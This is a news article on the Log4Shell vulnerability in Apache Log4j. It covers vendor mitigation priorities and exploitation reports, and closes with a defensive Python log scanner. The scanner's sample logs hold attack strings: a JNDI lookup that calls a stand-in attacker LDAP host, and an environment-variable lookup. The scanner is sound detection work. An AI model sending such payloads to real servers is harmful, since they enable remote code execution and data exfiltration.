Biggest security threat on the Internet in ten years


The Remote Code Execution (RCE) vulnerability detected in Apache’s Log4j could be the most severe vulnerability in the last decade, according to Orange Cyberdefense.

“Our analysts have noted that this may be the most serious vulnerability we’ve faced in the last decade and, possibly, in the history of modern cyber security,” the company stated.

Dubbed Log4Shell, the Log4j exploit was initially detected on 9 December 2021, but Orange Cyberdefense suspects that attackers may have used it before that date.

“We believe that attackers have been aggressively targeting this vulnerability since 1 December 2021 and possibly before that too,” it said.

“All organisations should anticipate that the vulnerability will be exploited in more sophisticated, targeted attacks in the near future.”

After the vulnerability was identified, the open-source developers promptly released a patch to fix it.

However, the fix itself was then discovered to have vulnerabilities, which allowed attackers to execute denial-of-service attacks, making it easy to take vulnerable services offline until they reboot their servers.

It was later discovered that one of the patch’s vulnerabilities (tracked as CVE-2021-45046) allowed for the exfiltration of sensitive data in certain circumstances.

Researchers encourage users to update to version 2.16.0, saying that the initial fix (version 2.15.0) “was incomplete in certain non-default configurations”.

Orange Cyberdefense explained that users urgently need to locate and upgrade all instances of Log4j to this latest version to mitigate the threat. It said organisations should consider the following priorities:

  1. Focus on the Internet and mitigate. Your first step should be to identify Internet-facing attack surfaces that might provide a path to a vulnerable system.
  2. Limit outbound internet connections.
  3. Communicate with your vendors. Several of the systems you own or use will be vulnerable. Your priority is to inventory your estate and establish a channel to your vendors.
  4. Patch Log4j everywhere. Remember that this issue is independent of the version of Java you are running. Upgrading to the latest Java version is recommended, but this will not address the Log4j vulnerability.
  5. Detect attacks and limit the impact.
  6. Defence in depth. This means patching everything we can, deploying endpoint protection, enforcing strong authentication and limiting user privileges, limiting traffic in, out, and across your network, and searching for abnormal behaviours.

It also said the new patch “fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default”.

How the Log4j exploit works

IT security company Sophos reported a substantial increase in attacks exploiting the Apache Log4j vulnerability on 12 December 2021.

The company determined that crypto mining botnets were some of the first to exploit the vulnerability, attributing this to the fact that they focus on vulnerable Linux server platforms.

Vulnerable organisations included Apple, Amazon, Tesla, Minecraft, and Google.

Sophos senior threat researcher Sean Gallagher said that the Log4j vulnerability presents a new challenge for cybersecurity companies.

“Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it.”

“However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organisation’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security,” he added.

Log4j interprets a log message as a URL, fetches it, and can even execute any executable payload it contains with the full privileges of the main program.

Exploits are triggered inside text using the ${} syntax, which allows them to be included in browser user agents or other commonly logged attributes.
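Because the lookup syntax rides in on ordinary logged fields such as the User-Agent, a first-pass detection (priority 5 above) is to scan web access logs for any ${...} pattern in attacker-controlled fields. The following is an added example, not code from the article or from Orange Cyberdefense or Sophos; it assumes Apache/nginx combined log format, and the sample lines and the host attacker.example are constructed.

```python
import re
from typing import Dict, List

# Combined log format:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Log4j lookup is "${" followed by text and a closing "}".
# No legitimate browser or client sends this in a User-Agent or URL,
# so its mere presence in a logged field is a strong signal.
LOOKUP_RE = re.compile(r'\$\{([^}]*)\}')

# Constructed sample lines: one benign, one lookup in the User-Agent,
# one lookup in the request path.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:09 +0000] "GET /?q=${env:HOSTNAME} HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
]


def find_lookups(line: str) -> List[Dict[str, str]]:
    """Return one finding per ${...} lookup found in a client-controlled field."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not combined format; a real scanner would count parse failures
    findings = []
    for field in ("request", "referer", "agent"):
        for lookup in LOOKUP_RE.findall(m.group(field)):
            # Text before the first ':' is the lookup type (jndi, env, sys, ...);
            # jndi is the RCE path, the others point at data exfiltration attempts.
            kind = lookup.split(":", 1)[0].strip().lower()
            findings.append({"ip": m.group("ip"), "field": field,
                             "kind": kind, "lookup": lookup})
    return findings


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan many log lines and collect every finding."""
    return [f for line in lines for f in find_lookups(line)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['field']}: {f['kind']} lookup -> {f['lookup']}")
```

A hit on a jndi lookup identifies a host that should be checked for outbound LDAP/RMI connections (priority 2), not just a request to block.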
